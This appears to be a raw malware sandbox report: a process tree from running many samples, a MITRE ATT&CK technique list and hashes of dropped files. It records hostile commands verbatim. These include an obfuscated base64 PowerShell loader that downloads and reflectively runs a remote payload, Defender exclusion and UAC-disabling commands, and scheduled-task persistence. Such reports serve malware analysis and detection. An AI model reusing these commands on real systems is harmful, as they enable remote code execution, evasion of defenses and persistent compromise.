-
C:\Windows\SysWOW64\Nlqmmd32.exeC:\Windows\system32\Nlqmmd32.exe18⤵PID:2060
-
C:\Windows\SysWOW64\Qndkpmkm.exeC:\Windows\system32\Qndkpmkm.exe19⤵PID:2696
-
C:\Windows\SysWOW64\Bqgmfkhg.exeC:\Windows\system32\Bqgmfkhg.exe20⤵PID:3084
-
C:\Windows\SysWOW64\Bgaebe32.exeC:\Windows\system32\Bgaebe32.exe21⤵PID:3228
-
C:\Windows\SysWOW64\Bigkel32.exeC:\Windows\system32\Bigkel32.exe22⤵PID:4300
-
C:\Windows\SysWOW64\Cbdiia32.exeC:\Windows\system32\Cbdiia32.exe23⤵PID:2312
-
C:\Windows\SysWOW64\Dpapaj32.exeC:\Windows\system32\Dpapaj32.exe24⤵PID:1156
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Nummmeret=Get-Content 'C:\Users\Admin\AppData\Local\Temp\forgrovelse\konstituerendes\Printermanualens.Ear';$Trojanerens=$Nummmeret.SubString(42833,3);.$Trojanerens($Nummmeret) "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"5⤵PID:1136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VCREDI~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VCREDI~2.EXE4⤵PID:6996
-
C:\Windows\SysWOW64\msiexec.exemsiexec /i vcredist.msi5⤵
- Event Triggered Execution: Installer Packages
PID:3296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3392
-
-
C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3456 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe4⤵
- Adds policy Run key to start application
- Boot or Logon Autostart Execution: Active Setup
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:328 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe5⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"5⤵PID:4476
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"5⤵PID:4828
-
C:\Windows\SysWOW64\install\Svchost.exe"C:\Windows\system32\install\Svchost.exe"6⤵PID:444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exeC:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe /C4⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:624 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gold.exe"C:\Users\Admin\AppData\Local\Temp\gold.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dwn" /tr '"C:\Users\Admin\AppData\Roaming\dwn.exe"' & exit4⤵PID:3516
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "dwn" /tr '"C:\Users\Admin\AppData\Roaming\dwn.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE32E.tmp.bat""4⤵PID:3196
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2660
-
-
C:\Users\Admin\AppData\Roaming\dwn.exe"C:\Users\Admin\AppData\Roaming\dwn.exe"5⤵PID:3084
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SW5WT0tlLWV4UFJlU1NJT04oKCc2SGMnKyd1JysncicrJ2wgPScrJyAnKydNUlBodHRwczonKycvL2lhJysnNicrJzAwMTAwLnUnKydzLmEnKydyYycrJ2hpJysndicrJ2UuJysnb3InKydnLzI0L2knKyd0ZW1zL2QnKydldGFoLW5vdGUtdi9EJysnZXQnKydhaE5vdGVWLnQnKyd4JysndCcrJ01SUCcrJzs2SGNiYXNlJysnNjRDb250JysnZW50JysnID0gKE5lJysndy1PYmplJysnY3QgUycrJ3lzdGVtLk5ldC5XZScrJ2JDJysnbGknKydlbnQpLkRvd24nKydsJysnb2FkJysnU3RyaW4nKydnJysnKDYnKydIJysnY3UnKydyJysnbCcrJyknKyc7NkhjYmluJysnYXJ5QycrJ29udGVudCA9ICcrJ1tTeXN0ZW0uQ29uJysndmVydF06OkZybycrJ20nKydCYXMnKydlNjQnKydTJysndHInKydpbmcoNkhjYmFzZTYnKyc0Q29udGVudCk7NicrJ0gnKydjYXNzZW1ibHknKycgPSBbUicrJ2VmbGUnKydjdGlvJysnbi5Bc3MnKydlJysnbWJseScrJ10nKyc6OkwnKydvJysnYWQnKycoNkhjJysnYmknKyduYXJ5QycrJ28nKydudGVudCk7NkgnKydjdHlwZScrJyA9JysnICcrJzZIYycrJ2Fzc2VtYicrJ2x5LkdldFR5JysncGUoTScrJ1JQUicrJ3VuUEUuSG8nKydtZScrJ00nKydSUCcrJyk7NkgnKydjbWV0aG8nKydkJysnICcrJz0nKycgJysnNicrJ0hjJysndHknKydwJysnZS5HZXRNJysnZXRoJysnb2QoTVInKydQJysnVkFJTVJQKScrJzs2SGMnKydtZScrJ3QnKydob2QuSW52b2tlKDZIJysnY24nKyd1JysnbGwsIFtvYmplYycrJ3RbXV1AKE0nKydSJysnUHR4dC4nKyd5YScrJ2Rub20vdmUnKydkLjInKydyLjMnKyc5YjM0NTMwJysnMmEwNzViMWJjMGQ0JysnNWInKyc2MycrJzJlYjllZTYyLWJ1cC8nKycvOnNwJysndHRoTVJQICwgTVJQZGVzYXQnKydpJysndicrJ2FkbycrJ01SUCAsIE0nKydSUCcrJ2Rlc2F0aXYnKydhZCcrJ29NUicrJ1AgLCBNUlBkZXMnKydhdGl2YScrJ2RvTVJQLE1SUEEnKydkZEknKyduUHJvY2VzczMnKycyTVJQJysnLE0nKydSJysnUE1SUCkpJykuUmVQbGFjRSgnNkhjJyxbU3RSaW5HXVtDSEFSXTM2KS5SZVBsYWNFKChbQ0hBUl03NytbQ0hBUl04MitbQ0hBUl04MCksW1N0UmluR11bQ0hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "InVOKe-exPReSSION(('6Hc'+'u'+'r'+'l ='+' '+'MRPhttps:'+'//ia'+'6'+'00100.u'+'s.a'+'rc'+'hi'+'v'+'e.'+'or'+'g/24/i'+'tems/d'+'etah-note-v/D'+'et'+'ahNoteV.t'+'x'+'t'+'MRP'+';6Hcbase'+'64Cont'+'ent'+' = (Ne'+'w-Obje'+'ct S'+'ystem.Net.We'+'bC'+'li'+'ent).Down'+'l'+'oad'+'Strin'+'g'+'(6'+'H'+'cu'+'r'+'l'+')'+';6Hcbin'+'aryC'+'ontent = '+'[System.Con'+'vert]::Fro'+'m'+'Bas'+'e64'+'S'+'tr'+'ing(6Hcbase6'+'4Content);6'+'H'+'cassembly'+' = [R'+'efle'+'ctio'+'n.Ass'+'e'+'mbly'+']'+'::L'+'o'+'ad'+'(6Hc'+'bi'+'naryC'+'o'+'ntent);6H'+'ctype'+' ='+' '+'6Hc'+'assemb'+'ly.GetTy'+'pe(M'+'RPR'+'unPE.Ho'+'me'+'M'+'RP'+');6H'+'cmetho'+'d'+' '+'='+' '+'6'+'Hc'+'ty'+'p'+'e.GetM'+'eth'+'od(MR'+'P'+'VAIMRP)'+';6Hc'+'me'+'t'+'hod.Invoke(6H'+'cn'+'u'+'ll, [objec'+'t[]]@(M'+'R'+'Ptxt.'+'ya'+'dnom/ve'+'d.2'+'r.3'+'9b34530'+'2a075b1bc0d4'+'5b'+'63'+'2eb9ee62-bup/'+'/:sp'+'tthMRP , MRPdesat'+'i'+'v'+'ado'+'MRP , M'+'RP'+'desativ'+'ad'+'oMR'+'P , MRPdes'+'ativa'+'doMRP,MRPA'+'ddI'+'nProcess3'+'2MRP'+',M'+'R'+'PMRP))').RePlacE('6Hc',[StRinG][CHAR]36).RePlacE(([CHAR]77+[CHAR]82+[CHAR]80),[StRinG][CHAR]39) )"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\l6E.exe"C:\Users\Admin\AppData\Local\Temp\l6E.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3484 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:924 -
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"4⤵PID:1772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"5⤵PID:6420
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:6472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tt.exe"C:\Users\Admin\AppData\Local\Temp\tt.exe"3⤵
- Executes dropped EXE
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"3⤵
- Executes dropped EXE
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"4⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\30.dllC:\Users\Admin\AppData\Local\Temp\30.dll5⤵PID:5072
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN 30.dll6⤵PID:4572
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "30.dll" /TR "C:\Users\Admin\AppData\Local\Temp\30.dll \"\30.dll\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:4752
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN 30.dll6⤵PID:4156
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Py017394- 01.htm4⤵PID:4680
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4680 CREDAT:275457 /prefetch:25⤵PID:4900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:7104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GFoZjxH.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:7148
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GFoZjxH" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1027.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵PID:992
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\is-FUA7D.tmp\is-PFFTE.tmp"C:\Users\Admin\AppData\Local\Temp\is-FUA7D.tmp\is-PFFTE.tmp" /SL4 $6019C C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 2516569 512004⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Program Files (x86)\STV\stvcn.exe"C:\Program Files (x86)\STV\stvcn.exe" /Q5⤵PID:3608
-
-
C:\Program Files (x86)\STV\stvserver.exe"C:\Program Files (x86)\STV\stvserver.exe"5⤵PID:4532
-
-
C:\Program Files (x86)\STV\STV.exe"C:\Program Files (x86)\STV\STV.exe"5⤵PID:4040
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s C:\Windows\PowerPlayer.dll6⤵PID:5156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\OGGY.exe"C:\Users\Admin\AppData\Local\Temp\OGGY.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit4⤵PID:4388
-
C:\Windows\system32\wusa.exewusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\5⤵PID:1480
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\888.vbs"4⤵PID:2512
-
C:\Windows\System32\migwiz\migwiz.exe"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵PID:2580
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵PID:3108
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- Modifies registry key
PID:3224
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:3952 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\lol.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5092
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1020
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-42476039414976241875329430171889409600-2026697860-1633785140-1373501402-1457583742"1⤵PID:2456
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "63396603416035886442529931041329192164-1107958084-791679324-153126887193286288"1⤵PID:1332
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21130897672034579650-1307221766-206557952-1697384331994312172058154270432347091"1⤵PID:1036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2012373451-1774699112-5482010731713240353-523726442-1311428411749629344-12287364"1⤵PID:1504
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3552
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2624
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
4Active Setup
1Registry Run Keys / Startup Folder
3Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Installer Packages
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
4Active Setup
1Registry Run Keys / Startup Folder
3Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Installer Packages
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
10Obfuscated Files or Information
1Command Obfuscation
1Pre-OS Boot
1Bootkit
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD58b116072a75efa3da377ba2bc0900091
SHA12bd8b6e2d87b59c31cdf4e0216320b35fd7958e1
SHA256b807d80e134022e64a590feace5f2b5e8bc21774f835a1208562d483c2eeef36
SHA51271d6c41a8870759793ad2e429cc5c0b8cd71d93ca2c53aa8fdb85f9d89e328ed37fae22653bcef54a8f00b8e54128f929432f33388bc938bfe6d58cca0211f19
-
Filesize
777KB
MD5669abe7232a5d0490168e67b3e9215f3
SHA16d206af6c7ab2da96fb73895e6849f5e9a7857f9
SHA256cc856d721b3b378b950d00fd54a54f9baad14b93f41137c82ed16c04517420a0
SHA512b814f99c5d74a251d3d327090137d6470adaa5c3e532e92e7e872fc1ab23de62fd26e3d5c53ec74c5cca3fd349fe29fa657bfd5697811c02cbd8fe8c2d5c8f9d
-
Filesize
457KB
MD56ee70ce9eaaed499fc000c985ae65e0a
SHA14fb232b74822fccd40b974fc0f8c83e62ea86ba4
SHA2566bdbfd7f267e35c2c95506afb8ff9569afed9029a48d2280adfba34b6a516296
SHA512fcefe9cb17a3b6dbfae8c134cdf1889fc592f2b146905b322238b55e34e053c5db25df83ede0a86dabc2c92fbf574896f9056782ee2aba6aca23018318e80be8
-
Filesize
387KB
MD5572036d5463b29b76433e14301d7c68a
SHA1b2d7a92b5c0b47ad5f8b9c54a55547f0c12e1399
SHA256f5776f97afa32aebf2fac763f3e796a6b4c405c7545f48653ac8a1b2b8c3249c
SHA51238cf1a764b2c650fa8a282dd921e5b0fd5ebb48980893d0edd0d8461c0748b24512f5e19fdbb939e56867c9caa94ce290286814714308548e06d60713703c9ae
-
Filesize
6KB
MD5b7b3f7e3e69425454ff05a616a726f26
SHA15239e853802b443cbc9b3752809cd2d84358c7c8
SHA256f1264331f55bf0ae1b3ae4b54d3b64e21b844a108666e006d25a59299c33b749
SHA5127512e0b4fc1d0898cc6c33bb0dcdc2730d8bfdf8a714b27f1e532c064c543971838263da6b7727e82276946acd3878e68d4b5637ad96dac17062255f622b4c0f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD57c695a90f7d89458e5ca9c26847f7a4a
SHA1b1178d9e6952a440a4e1b63602fef480583919cd
SHA2563e1b6d1d771a2cec815988b0cb2fb33721f2c0a61730c59823b30e7835f3437a
SHA512f95c888e8bf852f9334a8d52cd39c678be4fa1ace930730fd52187bf590b09f82a72958fbdf4ec733cf8d85812823f57fe02a3ade8e90daf48abfb96832f0090
-
C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Filesize487KB
MD5d9ade81857f1e31c667c61fc45de2a31
SHA12765c74e8c4f4d18ca1785123bf8dab1cfcf52dc
SHA256016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0
SHA51215cfe9f990a95b89790097ba4d888b315abe4c2fc9aad182a9c9470b17763c84e850c508c70cfcee9824bcde05542856d7b9a129ec4e4d9d1c9bf19ef3b5dac0
-
Filesize
830KB
MD51955e7fe3c25216101d012eb0b33f527
SHA1f8a184b3b5a5cfa0f3c7d46e519fee24fd91d5c7
SHA25655194a6530652599dfc4af96f87f39575ddd9f7f30c912cd59240dd26373940b
SHA5125c4a65e898f89bdb83b66aa15205200c359a64994b939eb5ca8fe3b1d94eb67a3174a784616f984e4a21663680a496f7a50b00be35ad12c6d38df10cabd65233
-
Filesize
47KB
MD59dda4db9e90ff039ad5a58785b9d626d
SHA1507730d87b32541886ec1dd77f3459fa7bf1e973
SHA256fc31b205d5e4f32fa0c71c8f72ee06b92a28bd8690f71ab8f94ff401af2228fe
SHA5124cfecaaccd0f8f9e31690ff80cca83edc962e73861043fffded1a3847201455d5adca7c5ef3866c65e6e516205e67b2f31c8149aad5be1065c1eb586b013f86a
-
C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
Filesize159KB
MD5d69165cfd5e6da160c2a60bad8a9daff
SHA1466caab305aace6234238a45b5dad9d6c0f182ff
SHA2565fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f
SHA5122f55cc32d9355bc6e6e814a7fee6bf45051eafab56ec3935598483164278ba4cdbf560a1c2491fff54f7dbe67fa9c718893e4d19047b0846cc3e1fd6f329b002
-
Filesize
8B
MD5140150e8159952c0c8bca09061a24006
SHA14ab4b2c0ed487d89981b7a26bf46a6b4a539c2da
SHA256f10c74800c5054169dea682e17723137d5bd0de9727a802484daca27e6af6c94
SHA51248ddf6417872cc1aba35a350bc13a46775799eeab4e94c4f9f1aa960cc6b16113d3ce93e51a56ef24c102a790735ae7cca1d33158da120c284236fb6d2f06cee
-
Filesize
8B
MD5b80a98727c5c915f442b1cfd846e35f9
SHA1f44e8b0851f533b1f9f2cd4c64dad60cf5c29c15
SHA2569b5cc307b5fe8839cd5cca371544d96d37b5cc66b2e821348d6663da34ed422e
SHA512f30b5c3bd098abbb7f2017bfc642a3050e5c86a4684761870194204bc96d2554f4df6f5f7f104ad760d763bd21543e047aa28d5aab0f1dd80258139e686bbf66
-
Filesize
8B
MD52bc675b6bab349c5b03f9d710f5abad8
SHA1dbbce068e8dfe83fa12df9f9518e8b123cb7d319
SHA256d101a1d358cbfc2cae98f09f01143fa9436e4b97f2cfec39ec73f16d24067900
SHA5120b4e5b30f16cea0532a667b1df92e08d68e4d0ae80ef368654097550804c6d2f7e378cefad1b8fb4eda4ae0499fc2a9d866c4361335ed18f189be37da75e113d
-
Filesize
8B
MD58efc40d367fa1b31353f16463f7d3bf4
SHA1c89f596ce2443cdfdd7288c39335d220d146b2ca
SHA256a07eacdd7c3a0e4e93824c54903d4115232f444fbe41a14ac3c450f3c1ff1bb1
SHA512a2b7c62af0bd282b82cc187412b3e58aa25216dc5ac7564ce4b4bb3075922437b319aaa3437d32ef105b7fa3252eb3156ec2bff6f5071774ff063a2bc1f7815e
-
Filesize
8B
MD5a03c9f64c43d66cc0df2bb62e4f869be
SHA199a89e10077864645cbec8c2c684f21415977cc2
SHA256f0a44ce8a71d11334f6cb32f8ab19bd8225cf430eff906e726fa598c021419fd
SHA512b9ce8044a17a781cbe606cdf165bfb85c38354eb2acdd3e158ffd54f533cb43f2ba080dbf96493804470fc223ffabdb50298535a96d7cb0528983f11ab953fa8
-
Filesize
8B
MD545116fce1a0beac67f44f41b28e7e3d8
SHA165dcafaec584cf29ee095072bf2b3bff56530bf4
SHA256e412c6f5777bc60169b841b987bb22fa6818a84595a13ffa59ba2db1c1b00f55
SHA512c6bda103c38ba299efe868766860311d3a7ea219c115c252e9477689e225e80f893bfd006f91c2851e5f367793f5df77936faa608f26c9691737176d2889409a
-
Filesize
8B
MD5fb00fe962c07959c85aa66201833fcaf
SHA10cace291603d43d85fd527709cf8c7d605fe2c66
SHA2561a62e7e63d03fe6fe6ad749212a6e8330b06d8dac0b9a54d613b6240333d3391
SHA512b012df626152b00d1699c6a6adde62c3f73eab802db42004dd1420ff4b9731b969cc694ca9eaf9c0174729930d9ffc99d29216fbc9a0386a610ac706454730d5
-
Filesize
8B
MD5bfc11ea044ac564a022336745dfb71a2
SHA15426a4f4a7b9fec76ccaf4c8171d25d1c7896406
SHA2560bd77a697e3767ea1f6b33aba30a9e76c9a1dc2ac389b4b51462c3b15174d102
